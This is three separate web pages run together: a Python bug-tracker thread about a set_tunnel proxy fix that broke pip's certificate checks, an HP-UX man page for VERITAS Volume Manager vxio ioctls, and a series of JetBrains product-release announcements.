- Find types on NuGet. When a type or namespace used inside your project can't be resolved to a referenced library or package, ReSharper can now search for it in the NuGet package gallery, display the list of matching packages, and easily download and install the package that you choose.
- New Source Templates that can be created anywhere in the code of your project as extension methods; they can be very handy when you need to produce some repeatable code that is only relevant in your current project or solution.

The other .NET tools in ReSharper Ultimate have been enhanced as well:
- dotCover 3.1 improves support for MSTest and WinStore tests and ships numerous fixes for the console tools.
- dotTrace 6.1 receives the long-awaited support for SQL queries in Timeline profiling mode. Now you can determine exactly how long a particular query executes and which method runs the query.
- The rich set of informative views in dotMemory 4.3 is extended with a Dominators sunburst chart. A quick glance at the hierarchy of dominators tells you which objects are crucial and how memory is retained in your application.
- Welcome dotMemory Unit: a state-of-the-art .NET memory monitoring framework. You can now extend your unit tests with the functionality of a memory profiler. Please check this blog post for more details.
- dotPeek 1.4 adds support for Visual Studio 2015 and C# 6.0.

In addition to these upgrades to our .NET tools, we are rolling out the inaugural release of ReSharper C++. A separate product for C++ developers who work in Visual Studio, ReSharper C++ inherits most features of ReSharper, including its powerful navigation, coding assistance and code generation. To learn more, please visit the ReSharper C++ web site. Download ReSharper Ultimate featuring ReSharper C++ and give it a try!

WebStorm 10. Because JavaScript

Today is a big day for us, as we roll out WebStorm 10, a major update of your favorite JavaScript IDE. You can download and install it right now! This 10th anniversary release strives to meet your highest expectations in language and technology support, fast performance and powerful features:
- Improved JavaScript support: we've completely reworked support for JavaScript and added support for lots of languages that compile to JavaScript.
- V8 profiling for Node.js apps: capture and analyze V8 CPU profiles and heap snapshots to eliminate performance bottlenecks and fight memory issues.

Other noticeable updates include a brand new Distraction-free mode, improved Grunt integration, simultaneous HTML tag editing, project-wide Dart code analysis, and HiDPI support for Windows and Linux. For a more detailed overview please visit What's new in WebStorm 10, and download the IDE for your OS.

IntelliJ IDEA 14.1 is Here

We've worked hard this year to bring you IntelliJ IDEA 14.1, a fresh update for your favorite Java IDE. For more details please read What's New in IntelliJ IDEA 14.1 and download the edition of your choice.
import "golang.org/x/exp/sumdb/internal/sumweb"

Package sumweb implements the HTTP protocols for serving or accessing a go.sum database.

Package files: cache.go client.go encode.go server.go test.go

ErrGONOSUMDB is returned by Lookup for paths that match a pattern listed in the GONOSUMDB list (set by SetGONOSUMDB, usually from the environment variable). ErrSecurity is returned by Conn operations that invoke Client.SecurityError. ErrWriteConflict signals a write conflict during Client.WriteConfig.

Paths are the URL paths for which Handler should be invoked. Typically a server will do:

    handler := &sumweb.Handler{Server: srv}
    for _, path := range sumweb.Paths {
        http.HandleFunc(path, handler)
    }

    type Client interface {
        // ReadRemote reads and returns the content served at the given path
        // on the remote database server. The path begins with "/lookup" or "/tile/".
        // It is the implementation's responsibility to turn that path into a full URL
        // and make the HTTP request. ReadRemote should return an error for
        // any non-200 HTTP response status.
        ReadRemote(path string) ([]byte, error)

        // ReadConfig reads and returns the content of the named configuration file.
        // There are only a fixed set of configuration files.
        //
        // "key" returns a file containing the verifier key for the server.
        //
        // serverName + "/latest" returns a file containing the latest known
        // signed tree from the server. It is read and written (using WriteConfig).
        // To signal that the client wishes to start with an "empty" signed tree,
        // ReadConfig can return a successful empty result (0 bytes of data).
        ReadConfig(file string) ([]byte, error)

        // WriteConfig updates the content of the named configuration file,
        // changing it from the old []byte to the new []byte.
        // If the old []byte does not match the stored configuration,
        // WriteConfig must return ErrWriteConflict.
        // Otherwise, WriteConfig should atomically replace old with new.
        WriteConfig(file string, old, new []byte) error

        // ReadCache reads and returns the content of the named cache file.
        // Any returned error will be treated as equivalent to the file not existing.
        // There can be arbitrarily many cache files, such as:
        //     serverName/lookup/pkg@version
        //     serverName/tile/8/1/x123/456
        ReadCache(file string) ([]byte, error)

        // WriteCache writes the named cache file.
        WriteCache(file string, data []byte)

        // Log prints the given log message (such as with log.Print).
        Log(msg string)

        // SecurityError prints the given security error log message.
        // The Conn returns ErrSecurity from any operation that invokes SecurityError,
        // but the return value is mainly for testing. In a real program,
        // SecurityError should typically print the message and call log.Fatal or os.Exit.
        SecurityError(msg string)
    }

A Client provides the external operations (file caching, HTTP fetches, and so on) needed to implement the HTTP client Conn. The methods must be safe for concurrent use by multiple goroutines.

A Conn is a client connection to a go.sum database. All the methods are safe for simultaneous use by multiple goroutines. NewConn returns a new Conn using the given Client.

Lookup returns the go.sum lines for the given module path and version. The version may end in a /go.mod suffix, in which case Lookup returns the go.sum lines for the module's go.mod-only hash.

SetGONOSUMDB sets the list of comma-separated GONOSUMDB patterns for the Conn. For any module path matching one of the patterns, Lookup will return ErrGONOSUMDB. Any call to SetGONOSUMDB must happen before the first call to Lookup.

SetTileHeight sets the tile height for the Conn. Any call to SetTileHeight must happen before the first call to Lookup. If SetTileHeight is not called, the Conn defaults to tile height 8.

A Handler is the go.sum database server handler, which should be invoked to serve the paths listed in Paths. The calling code is responsible for initializing Server.

    type Server interface {
        // NewContext returns the context to use for the request r.
        NewContext(r *http.Request) (context.Context, error)

        // Signed returns the signed hash of the latest tree.
        Signed(ctx context.Context) ([]byte, error)

        // ReadRecords returns the content for the n records id through id+n-1.
        ReadRecords(ctx context.Context, id, n int64) ([][]byte, error)

        // Lookup looks up a record by its associated key ("module@version"),
        // returning the record ID.
        Lookup(ctx context.Context, key string) (int64, error)

        // ReadTileData reads the content of tile t.
        // It is only invoked for hash tiles (t.L ≥ 0).
        ReadTileData(ctx context.Context, t tlog.Tile) ([]byte, error)
    }

A Server provides the external operations (underlying database access and so on) needed to implement the HTTP server Handler.

A TestServer is an in-memory implementation of Server for testing. NewTestServer constructs a new TestServer that will sign its tree with the given signer key (see golang.org/x/exp/sumdb/internal/note) and fetch new records as needed by calling gosum.
Day in and day out, I write large applications in perl. I'm cursed, I tell you. While large scale, long-running applications in pure perl may sound fairly easy to write, they are not. Perl, beyond a certain size and complexity, gets really difficult to manage if one is not extremely careful. The proper choice of an application framework helps to minimize this difficulty. For many applications, apache and mod_perl make a lot of sense. This is an excellent choice for user interface applications and data display systems. However, HTML and the WWW simply don't make sense for many forms of long-running applications, particularly network based servers. Apache certainly isn't the right choice for syslog monitoring or edge host traffic analysis. My framework of choice is POE.

SESSIONS

POE programs begin with a 'session'. Each session represents a cooperatively multi-tasked state machine.

    POE::Session->create(
        inline_states => {
            _start       => \&start,
            _stop        => \&stop,
            do_something => \&do_something,
        },
        heap => { 'some' => 'data' },
    );

Sessions provide very simple, easy to understand building blocks on which to build more complex applications. POE provides a way to give sessions names, called aliases, which uniquely address the session from outside the session itself. $poe_kernel->alias_set($alias) sets an alias for the current session. Any POE session in the process can then send events to that session using the named identifier.

    if ($door_bell) {
        $poe_kernel->post( $alias => 'pizza' );
    }

Remote addressing provides the ability to have a service-like model inside an application. Different sessions provide different services to the application. One session may provide DNS resolution while another provides data storage. Using commonly known names, perhaps stored in a config file, the central application becomes much smaller and easier to manage.

COMPONENTS

POE components provide an abstract api to service-like POE sessions.
Rather than duplicating the session construction call and the accompanying subroutines every time you find a new use for your sessions, it is a better idea to roll all that code into a perl module.

    package POE::Component::MyService;

    sub create {
        POE::Session->create(
            # ...
        );
    }

    sub start {
        $poe_kernel->alias_set(__PACKAGE__);
    }

    ####

    #!/usr/bin/perl
    use POE;
    use POE::Component::MyService;

    POE::Component::MyService->create();
    POE::Kernel->run();

The POE community has created a standard namespace of POE::Component for these modules. Typically they have a constructor called create() or spawn() and provide a service to the POE application via a session. Apart from these few simple rules, components are free to do whatever is necessary to fulfill their purpose. POE::Component::Server::Syslog, for instance, spawns a UDP listener and provides syslog data via callbacks. POE::Component::RSS accepts RSS content via an alias and calls specially named events to deliver data. POE::Component::IRC follows a similar model.

WHEELS

For some tasks, a full session is unnecessary. Sometimes, it makes more sense to alter the abilities of an existing session to provide the desired functionality. POE has a special namespace called POE::Wheel for modules which mutate or alter the abilities of the current session to provide some new functionality.

    package POE::Wheel::MyFunction;

    sub new {
        # ...
    }

    ####

    #!/usr/bin/perl
    use POE;
    use POE::Wheel::MyFunction;

    POE::Session->create(
        # ...
        foo => \&foo,
    );
    POE::Kernel->run();

    sub start {
        POE::Wheel::MyFunction->new( FooState => 'foo' );
    }

Where components often use subroutine callbacks in the same way as POE::Session, wheels use local event names to provide functionality. Internally, they create wrappers around calls to these events which build the context necessary for a POE event to occur. Wheels are much more complex to create, for good reason.
Wheels share their entire operating context with the user's session but share very little of the niceties. Wheels do not have their own heap and cannot create aliases for themselves. In many ways, they are like a parasite clinging to the side of the user's code. As long as they don't get in the way and they provide a useful function, they are allowed to exist. The development overhead is made up for, however, by the loss of internal POE overhead. Sessions require a certain amount of maintenance to keep running. POE checks sessions to see if they still have work to do, if there are timers or alarms outstanding for them, if they should be garbage collected, etc etc. The more sessions that exist in a system, the more that overhead grows. This overhead is especially noticeable in time sensitive applications. Wheels have none of this overhead. They piggyback on top of the user's session so, apart from any events they may trigger as part of their normal operation, there is no inherent internal POE overhead in using a wheel.

FILTERS

Many wheels handle incoming and outgoing data. They exist to help the user get data from some strange source (say, HTTP) into a format the user can analyze or take apart in perlish ways. POE::Wheel::SocketFactory, for instance, handles all the scariness of nonblocking socket creation and maintenance. For most of us, however, SocketFactory doesn't go far enough. I don't want to have to worry about pack calls or http headers or whatever other nonsense is necessary to take a transaction off the wire and make it palatable. Special modules in the POE::Filter namespace handle this drudgery.

    package POE::Filter::MyData;

    sub new {
        # ...
    }

    sub put {
        # ...
    }

    sub get {
        # ...
    }

Filters are very simple data parsing modules. Most POE filters are limited enough to be used outside of a POE environment. They know nothing of POE or of the running POE environment.
The standard interface requires three methods: new(), the constructor; get(), the input parser; and put(), the output generator. get() takes a stream of data and returns parsed records, which may be hashes, arrays, objects, or anything else one might desire. put() takes user generated records and converts them to raw data.

Design

With these four simple building blocks, POE applications can grow to meet almost any need while still being maintainable. The key is to break the application up into small chunks. This is beneficial for two main reasons: 1) the individual chunks are more easily understood by a new staff member or someone else looking at the code six months from now. 2) Smaller blocks of code spend less time ... well, blocking. Even long-running for-loops can be broken down into small POE events.

    while (@data) {
        # ... process, process
    }

can become

    $poe_kernel->yield('process_data' => $_) for @data;

This gives POE time to read from sockets, do internal housekeeping, and so on, between each bit of processing time. If @data is large enough, however, this method can lead to resource depletion - spewing out 5000 events to process @data may get the job done and allow POE to do housekeeping, but it means that for the next 5000 event invocations, POE is doing nothing but processing that array. POE's event queue is a FIFO (First In, First Out). Events are processed in the order they are invoked. There are two major exceptions to this: signals can trigger immediate event processing, and using call() instead of yield() or post() will cause immediate event processing. Beyond those two exceptions, every event happens in order, all of the time. In the example above, we asked POE to push a large number of events on the queue. While POE can still read off whatever socket we're getting data from in between those yields, the events triggered by that socket read will not be invoked until after we're done processing our giant array. We can break that pattern out very easily.
If we don't need to process @data in any timely fashion, we can stagger the processing out further:

    $poe_kernel->delay_add('process_data' => $hence++ => $_) for @data;

This will process one chunk of @data every second. Not very efficient or timely, but other events can take place between invocations. One second is by no means the smallest time value accepted by delay_add(). Use of Time::HiRes allows for microsecond delay values:

    use Time::HiRes;
    use POE;

The use of Time::HiRes before importing POE causes POE to use Time::HiRes' time() instead of perl's built-in time(). While Time::HiRes has much greater resolution on time values, it may or may not be the most accurate time keeper on your particular platform. Do your homework and make the choice that best suits your situation and needs.

Conclusion

POE is a flexible application framework appropriate for long-running, large-scale perl applications. It provides standard interfaces for task abstraction and forces the coder to think about their software in smaller, more maintainable chunks. POE is available on CPAN and has a rich, community-maintained website.
Section 7.2 Failures

Let us consider a program \(s\) and a specification \((P,Q)\text{.}\) If \(s\) is not partially correct with respect to \((P,Q)\text{,}\) the program has an error. Then, due to Definition 7.1.8, there exists a state \(\sigma\models P\) such that \(\config s\sigma\) has one of the following outcomes:

\(\config s\sigma\) gets stuck.
\(\config s\sigma\) aborts.
\(\config s\sigma\) terminates properly in a state \(\sigma'\) but \(\sigma'\not\models Q\text{.}\)

Definition 7.2.1. Failure. A state \(\sigma\) is called a failure with respect to \(s\) and \((P,Q)\) if one of the three cases is true.

Remark 7.2.2. If \(s\) gets stuck, the semantics of the machine program that the compiler created for \(s\) is undefined. In that case, this machine program can either (a) diverge, (b) abort, or terminate properly in a state that either (c) satisfies or (d) does not satisfy the post condition. This means that, in the case of undefined behavior, we might not be able to observe a failure! This is the case in (a) and (c). So, when testing or debugging programs it is very helpful to avoid getting stuck (i.e. running into undefined behavior). This can be achieved by using sanitizers, which instrument the C program to detect undefined behavior during execution and cause the program to abort in such cases.

Remark 7.2.3. If a program is partially but not totally correct, there is an input that satisfies the precondition but causes the program to diverge. That means that if the program is free of failures, we can only conclude that it is partially correct.

A failure is a witness for an error. In general, however, failures do not inform us about the cause of the error, i.e. the part of the program that is erroneous. A failure is therefore a symptom, not a diagnosis.
Let us consider the following example:

    unsigned min(unsigned x, unsigned y) {
      if (x < y)
        return y;
      else
        return x;
    }

    unsigned sum_first_n(unsigned *arr, unsigned sz, unsigned n) {
      unsigned sum = 0;
      n = min(n, sz);
      for (unsigned i = 0; i < n; i++)
        sum += arr[i];
      return sum;
    }

Assume that the specification is given, as usual in practice, in plain English: The function sum_first_n shall sum up the first n, however at most sz, elements of the array arr. Let us consider the following calls to sum_first_n:

    int main() {
      unsigned arr[] = { 1, 2, 3 };
      unsigned r1 = sum_first_n(arr, 3, 2); // (1)
      unsigned r2 = sum_first_n(arr, 3, 3); // (2)
      unsigned r3 = sum_first_n(arr, 3, 4); // (3)
    }

The first call (1) is a failure because our specification demands that the result r1 must be 3; it is, however, 6. Call (2) is not a failure. Call (3) causes the program to get stuck: the last iteration of the loop in sum_first_n intends to access the array element arr + 3, which does not exist, and therefore the address arr + 3 is not valid. We discussed before (Remark 7.2.2) that we cannot make any assumptions on the program's behavior in this case.

The cause for the failure in (1) and the getting stuck in (3) is an error (also called defect or bug) in the function min: min does not compute the minimum but the maximum. This example shows that a failure may tell us little about the cause of the error that the failure exposes. In practice, it can be especially hard to localize the error in program code. The first input merely results in a wrong result, whereas the third causes undefined behavior, which can be hard to observe (see Remark 7.2.2).

Finding errors in programs can be significantly simplified if programs fail as early as possible when they enter an erroneous state. Then, the program won't continue executing with "wrong" values and thereby dislocating the cause from the symptom. A very common way to achieve this is to use assertions in the code to assert invariants, i.e.
conditions on the program state at a particular program point that have to hold for every input. These assertions can then be checked at runtime and, if they are violated, the program can be aborted immediately.

Definition 7.2.4. assert(). We define \(\CAssert e\) as \(\CIf{e}{\CBlock{}}{\CAbort}\text{,}\) i.e. assert(e) behaves like if (e) {} else abort();.

In C, assertions are typically implemented as macros that are expanded to an if-then-else construct as in Definition 7.2.4. When the macro NDEBUG is defined (typically by giving the command line switch -DNDEBUG), asserts can be deactivated by defining the macro assert to the empty text. This is typically done for production code that has been "sufficiently" tested.

Example 7.2.5. Assertions in the Minimum Program.

    #include <assert.h>

    unsigned min(unsigned x, unsigned y) {
      unsigned m = x < y ? x : y;
      assert(m <= x && m <= y && (m == x || m == y));
      return m;
    }

assert evaluates the argument expression. If the resulting value is 0, then the execution aborts immediately. Hence, the program aborts very close to the error location. In general, it is advisable to document as many invariants as possible using assertions. They come for free in terms of runtime in the production code because they can just be disabled. They can help to expose bugs and can make it easier to fix them. And they are also helpful for documentation purposes because they denote (at least part of) the invariant that the programmer had in mind for the particular program point. This holds especially for pre- and postconditions. Note however that the C expression language is often not strong enough to formulate powerful invariants because it does not contain quantifiers like the assertion language we have defined in Definition 7.1.2 (they would of course be very hard to check at runtime). Therefore, often only a part of the invariant can be documented in an assertion. Let us consider the following example where we can use assertions productively to specify the precondition.
In this case, the precondition is that the array is non-empty:

Example 7.2.6.

Consider a function that is supposed to find the minimum of all elements of an array. This operation is not well-defined on empty arrays, so it should not be possible to call the function with an empty array. We document this by the assertion assert(n > 0);. In debug builds, this assertion is checked during runtime, and readers of the code will see that the precondition is that we don't pass empty arrays.

unsigned min_arr(unsigned* arr, unsigned n) {
  assert(n > 0);
  unsigned res = arr[0];
  for (unsigned i = 1; i < n; i++)
    res = min(res, arr[i]);
  return res;
}

Note that checking the assertion in debug builds has a concrete benefit: if we accessed the first element of an empty array, the behavior of the program would be undefined, with all the consequences outlined in Remark 7.2.2. Checking the assertion at runtime, however, directly aborts the program in this situation, and the failure we get from that brings us closer to the error location.

Remark 7.2.7. Defensive Programming.

Programming defensively means that one does not only consider the happy path, that is, the simplest situation in which a piece of code is supposed to work and in which no exceptional or erroneous situations occur. Defensive programming means that one considers all possible inputs, including those that violate the precondition, and carefully makes sure that all preconditions are met.

Often, this is misunderstood to mean that the code should not abort in any case, i.e. that it is best if the precondition is \(\ltrue\text{.}\) Some programmers try to make this happen by "inventing" default values that are returned in the error case. In principle, it is a design choice where errors shall be handled. Consider the following example code. The function min_idx shall return the index of a smallest element in an array. Of course, the function is not defined on empty arrays, because they don't have a minimum.
The programmer could indicate the error situation by returning \(-1\) or something similar:

int min_idx(int* arr, unsigned n) {
  if (n == 0)
    return -1;
  int min = arr[0];
  int idx = 0;
  for (unsigned i = 1; i < n; i++) {
    if (arr[i] < min) {
      min = arr[i];
      idx = i;
    }
  }
  return idx;
}

Here, returning \(-1\) does not really help: \(-1\) is not a valid index into the array. Instead of checking for the result being \(-1\) after calling min_idx, the programmer could equally well have checked beforehand that the length of the array is greater than \(0\text{.}\) There is nothing gained from making min_idx "work" on all inputs. On the contrary, there is the risk of moving the failure further away from the error. Here, it would be best to just start min_idx with an assertion:

int min_idx(int* arr, unsigned n) {
  assert(n > 0);
  ...
}
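Returning to the example at the start of this section: a corrected min, together with the postcondition assertion from Example 7.2.5, makes all three calls from main behave as the specification demands — call (1) yields 3 and call (3) no longer accesses arr + 3.

```c
#include <assert.h>

/* Corrected: the buggy version from the beginning of this section
   accidentally computed the maximum. */
unsigned min(unsigned x, unsigned y) {
  unsigned m = x < y ? x : y;
  /* Postcondition from Example 7.2.5. */
  assert(m <= x && m <= y && (m == x || m == y));
  return m;
}

unsigned sum_first_n(unsigned *arr, unsigned sz, unsigned n) {
  unsigned sum = 0;
  n = min(n, sz); /* now really clamps n to sz */
  for (unsigned i = 0; i < n; i++)
    sum += arr[i];
  return sum;
}
```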
https://prog2.de/book/sec-corr-failures.html
CC-MAIN-2022-33
refinedweb
1,479
61.67
Hi. I would like to use conky to display EPG on my desktop. I found a cool website: and the owner, Mahzan Musa, was very kind to provide his code. THANK YOU

Unfortunately his html epg source is completely different from mine and the code was not so easy to understand for a first-timer. After a week of reading and googling I was able to make my first python code:

import urllib

texto = urllib.urlopen('').read()

index = texto.find('<td class="topaligned "><div class="withmargin nowrap"')
h1 = index + 55
index = texto[h1:].find('><span class="title">')
pi1 = h1 + index + 21
index = texto[pi1:].find('</span><br')
pf1 = pi1 + index
index = texto[pf1:].find('<td class="topaligned "><div class="withmargin nowrap"')
h2 = pf1 + index + 55
index = texto[h2:].find('><span class="title">')
pi2 = h2 + index + 21
index = texto[pi2:].find('</span><br')
pf2 = pi2 + index

print texto[h1:h1+19]+' '+texto[pi1:pf1]+'\n'+texto[h2:h2+19]+' '+texto[pi2:pf2]

this is the output:

08:00 PM - 08:30 PM As Princesas Gémeas do Planeta Maravilha T.1 Ep.2
08:30 PM - 09:00 PM As Princesas Gémeas do Planeta Maravilha T.1 Ep.3

It reads the html and prints the first 2 shows, time and name. It's what I was looking for; now I can display this info with conky.

Now I have a problem: I want more than one channel (120 in the url in my code). I could copy, paste, change the channel number and save n copies of it, but that's not the best option. I would like to pass an argument when running the py, like python epg.py <channel number>. What do I have to change/implement to achieve this?
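A sketch of one way to do this with sys.argv. The base URL below is a placeholder (the real URL is blanked out in the post above) — keep the URL from your own script and put the channel number where "120" used to appear:

```python
import sys
import urllib

# Placeholder -- substitute the real EPG URL from your script here.
BASE_URL = 'http://example.com/epg?channel='

def build_url(channel):
    """Return the EPG page URL for the given channel number."""
    return BASE_URL + str(channel)

def main(argv):
    # argv[0] is the script name, argv[1] should be the channel number.
    if len(argv) != 2:
        sys.stderr.write('usage: python epg.py <channel number>\n')
        return 1
    texto = urllib.urlopen(build_url(argv[1])).read()
    # ... the parsing code from the post goes here, unchanged ...
    return 0
```

At the bottom of the script, call it with sys.exit(main(sys.argv)), then run python epg.py 120, python epg.py 121, and so on.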
https://www.daniweb.com/programming/software-development/threads/273944/how-to-run-a-py-with-a-s
I am building a module, which will have an apiController with 2 functions:

get userid - return a list of ints (list of favorite pages ids)
get user id + page id - save to DB

I created this record:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using Orchard.ContentManagement.Records;

namespace YIT.FavoriteArticles.Models
{
    public class UserFavoriteArticleRecord : ContentPartRecord
    {
        public virtual int userId { get; set; }
        public virtual int articleId { get; set; }
    }
}

My problem is that in order to create a migration I need this record to be a content part, which means that in order to create instances of this record, I need to associate the content parts to a page. How can I build this controller with a migration, or just connect it to a table I created in the database, without the record instances appearing in the admin gui? Thanks :)

Why did you derive from ContentPartRecord? All you need is an Id column.

If I don't derive from ContentPartRecord AND create a migration with codegen, how would I be able to create record instances (and save them in the DB) with my apiController? And how would I be able to get records based on the userId?

If you have an Id properly defined, it will get mapped, and you can inject an IRepository<T> to manipulate the table.

When I use the Create method of IRepository, do I need to give an id to the record I'm passing it? or does it generate the id? for example, is this good enough?
public HttpResponseMessage AttachArticleToUser(int userId, int articleId)
{
    try
    {
        UserFavoriteArticleRecord record = new UserFavoriteArticleRecord();
        record.articleId = articleId;
        record.userId = userId;
        _repository.Create(record);
        return Request.CreateResponse(HttpStatusCode.OK, "1");
    }
    catch (Exception ex)
    {
        return Request.CreateResponse(HttpStatusCode.NotAcceptable, ex.Message);
    }
}

And another question: do I need to add something to the migration automatically created for the module by code generation?

It does generate it. Your migration should set up the Id column something like this:

Column<int>("Id", column => column.PrimaryKey().NotNull());
http://orchard.codeplex.com/discussions/405383
SYNOPSIS

#include <fmtmsg.h>

int addseverity(int severity, const char *s);

Feature Test Macro Requirements for glibc (see feature_test_macros(7)):

addseverity():
    Since glibc 2.19: _DEFAULT_SOURCE
    Glibc 2.19 and earlier: _SVID_SOURCE

DESCRIPTION
This function allows the introduction of new severity classes which can be addressed by the severity argument of the fmtmsg(3) function. By default, that function knows only how to print messages for severity 0-4 (with strings (none), HALT, ERROR, WARNING, INFO). This call attaches the given string s to the given value severity. If s is NULL, the severity class with the numeric value severity is removed. It is not possible to overwrite or remove one of the default severity classes. The severity value must be nonnegative.

RETURN VALUE
Upon success, the value MM_OK is returned. Upon error, the return value is MM_NOTOK. Possible errors include: out of memory, attempt to remove a nonexistent or default severity class.

VERSIONS
addseverity() is provided in glibc since version 2.1.

ATTRIBUTES
For an explanation of the terms used in this section, see attributes(7).

CONFORMING TO
This function is not specified in the X/Open Portability Guide although the fmtmsg(3) function is. It is available on System V systems.

NOTES
New severity classes can also be added by setting the environment variable SEV_LEVEL.

COLOPHON
This page is part of release 4.06 of the Linux man-pages project. A description of the project, information about reporting bugs, and the latest version of this page, can be found at.
http://manpages.org/addseverity/3
Opened 17 months ago Closed 17 months ago Last modified 17 months ago #22126 closed Bug (duplicate) Unicode error using GeoIP `country_name()` method Description The method country_name() located at django.contrib.gis.geoip.GeoIP returns a str instead of unicode string and fails when the name contains non ASCII chars. The error I'm getting is: 'utf8' codec can't decode byte 0xe7 in position 170: invalid continuation byte. The string that could not be encoded/decoded was: 'Cura�ao' To reproduce it do a lookup with: from django.contrib.gis.geoip import GeoIP GeoIP().country_name('190.185.103.13') If instead of using the method country_name() we use city() the returned info is different (inconsistency?): {'city': u'Neuquen', 'continent_code': u'SA', 'region': u'15', 'charset': 0, 'area_code': 0, 'longitude': -68.05909729003906, 'country_code3': u'ARG', 'latitude': -38.95159912109375, 'postal_code': None, 'dma_code': 0, 'country_code': u'AR', 'country_name': u'Argentina'} Change History (4) comment:1 Changed 17 months ago by erikr - Cc eromijn@… added - Needs documentation unset - Needs tests unset - Owner changed from nobody to erikr - Patch needs improvement unset - Status changed from new to assigned comment:2 Changed 17 months ago by erikr - Resolution set to duplicate - Status changed from assigned to closed - Triage Stage changed from Unreviewed to Accepted comment:3 follow-up: ↓ 4 Changed 17 months ago by caumons Will this be backported to v 1.5? And... what about the country inconsistency calling country_name() and city()? Is this somehow related to the encoding error? comment:4 in reply to: ↑ 3 Changed 17 months ago by claudep Will this be backported to v 1.5? No, 1.5 is in security-only fix mode. And... what about the country inconsistency calling country_name() and city()? Is this somehow related to the encoding error? I doubt this is a problem in Django, and I'm unable to reproduce it on my system. 
g.country_name('190.185.103.13')
u'Argentina'

This is a duplicate of #21996, which was fixed in 1.7 and backported to 1.6.
https://code.djangoproject.com/ticket/22126
the pygobject testsuite fails if pygtk isn't installed:

make[2]: Entering directory `/var/tmp/portage/dev-python/pygobject-2.14.0/work/pygobject-2.14.0/tests'
Traceback (most recent call last):
  File "./runtests.py", line 42, in <module>
    suite.addTest(loader.loadTestsFromName(name))
  File "/usr/lib64/python2.5/unittest.py", line 533, in loadTestsFromName
    module = __import__('.'.join(parts_copy))
  File "../tests/test_subtype.py", line 9, in <module>
    import gtk
ImportError: No module named gtk
make[2]: *** [check-local] Error 1

unfortunately pygtk RDEPENDs on pygobject, creating a circular dependency. because of this, it might be best to add RESTRICT=test to the pygobject ebuild.

Hmm... That's a very very hard one. Gnome team: maybe patch out any tests needing pygtk? Or block tests all together? In general, a new system should probably not be installed with FEATURES=test, but that's not a real solution.

I had this issue while upgrading to python-2.5 and running /usr/sbin/python-updater. pygobject bailed out with the same error. Solved this by manually running:

# FEATURES="-test" emerge -1 pygobject && emerge -1 pygtk && emerge -1 pygobject

What about making pygobject DEPEND="test? ( dev-python/pygtk )"? This would introduce a circular dependency, which needs to be resolved the way described above. BR, Dustin

*** Bug 228497 has been marked as a duplicate of this bug. ***
*** Bug 231412 has been marked as a duplicate of this bug. ***
*** Bug 217349 has been marked as a duplicate of this bug. ***

If no one wants to fix this, I'll be adding RESTRICT=test to pygobject.

Why not add the DEPEND mentioned in comment #2? Plus a message on how to resolve the circular dependency.
Because a circular dependency happens when the package manager is building a dependency graph, before the list of packages to build is displayed, and before any particular package can display a message. *** Bug 233362 has been marked as a duplicate of this bug. *** For the record, the latest versions pygtk and pygobject should be fixed as the codegen tool needed for the tests has been moved to pygobject. So basically, the circular dep is gone. Hopefully, we should get those versions into portage along with Gnome 2.24. Keeping this bug open until it's in portage. Thanks I was sick of this test suite failing in my chroot for arch testing so I added RESTRICT="test" to pygobject-2.14.2 as a simple workaround. Hope no one screams too loudly ;) (In reply to comment #10) > For the record, the latest versions pygtk and pygobject should be fixed as the > codegen tool needed for the tests has been moved to pygobject. So basically, > the circular dep is gone. > I'm not sure what version "the latest" is, but I still see this with pygobject 2.15.4. Is this fixed with a newer version, or should it have been fixed in this version?
http://bugs.gentoo.org/199725
Hi I'm stuck on this very simple programme. The user is prompted to enter an equation and, if it is not in the format x + y = z, I would like it to output an error message. However, if someone typed in 2 + 3 = 3 + 2, the addition 3 + 2 is automatically done and the value of 5 goes into z. If anyone can help me, I'm very confused! Thanks!

Code:
#include <iostream>
#include <string>
using namespace std;

int main ()
{
    cout << "Please enter an equation." << endl;
    int x, y, result;
    string sign, equals;
    cin >> x >> sign >> y >> equals >> result;

    if ((cin.fail()) || (sign != "+") && (sign != "-"))
    {
        cout << "Invalid Input";
        return 1;
    }

    bool plus = false;
    if (sign == "+")
        plus = true;

    //check for addition/minus
    if (plus)
    {
        if (x + y == result)
            cout << "Correct1";
        else
            cout << "Incorrect1";
    }
    else
    {
        if (x - y == result)
            cout << "Correct2";
        else
            cout << "Incorrect2";
    }
}
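For what it's worth, one way to reject trailing input such as "3 + 2" is to read the whole line first and then parse it from a stringstream, failing if any token is left over. This is only a sketch; the helper name valid_equation is mine, not standard:

```cpp
#include <cassert>
#include <sstream>
#include <string>
using namespace std;

// Returns true only if line has exactly the form "x + y = z" or "x - y = z",
// with nothing left over afterwards (so "2 + 3 = 3 + 2" is rejected).
bool valid_equation(const string& line, int& x, int& y, int& result, string& sign)
{
    istringstream in(line);
    string equals, extra;
    if (!(in >> x >> sign >> y >> equals >> result))
        return false;                       // wrong shape or not numbers
    if (equals != "=")
        return false;
    if (sign != "+" && sign != "-")
        return false;
    if (in >> extra)
        return false;                       // trailing tokens such as "+ 2"
    return true;
}
```

In main you would read the input with getline(cin, line) and then call valid_equation(line, x, y, result, sign) before checking the arithmetic.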
https://cboard.cprogramming.com/cplusplus-programming/58145-beginner-trouble.html
Programmer's Reference Guide

CAPTCHA Adapters

The following adapters are shipped with Zend Framework by default.

Zend_Captcha_Word

Zend_Captcha_Word is an abstract adapter that serves as the base class for most other CAPTCHA adapters. It provides mutators for specifying word length, session TTL, the session namespace object to use, and the session namespace class to use for persistence if you do not wish to use Zend_Session_Namespace. Zend_Captcha_Word encapsulates validation logic.

By default, the word length is 8 characters, the session timeout is 5 minutes, and Zend_Session_Namespace is used for persistence (using the namespace "Zend_Form_Captcha_<captcha ID>").

In addition to the methods required by the Zend_Captcha_Adapter interface, Zend_Captcha_Word exposes the following methods:

- setWordLen($length) and getWordLen() allow you to specify the length of the generated "word" in characters, and to retrieve the current value.
- setTimeout($ttl) and getTimeout() allow you to specify the time-to-live of the session token, and to retrieve the current value. $ttl should be specified in seconds.
- setSessionClass($class) and getSessionClass() allow you to specify an alternate Zend_Session_Namespace implementation to use to persist the CAPTCHA token, and to retrieve the current value.
- getId() allows you to retrieve the current token identifier.
- getWord() allows you to retrieve the generated word to use with the CAPTCHA. It will generate the word for you if none has been generated yet.
- setSession(Zend_Session_Namespace $session) allows you to specify a session object to use for persisting the CAPTCHA token.
- getSession() allows you to retrieve the current session object.

All word CAPTCHAs allow you to pass an array of options to the constructor, or, alternately, pass them to setOptions(). You can also pass a Zend_Config object to setConfig(). By default, the wordLen, timeout, and sessionClass keys may all be used.
Each concrete implementation may define additional keys or utilize the options in other ways.

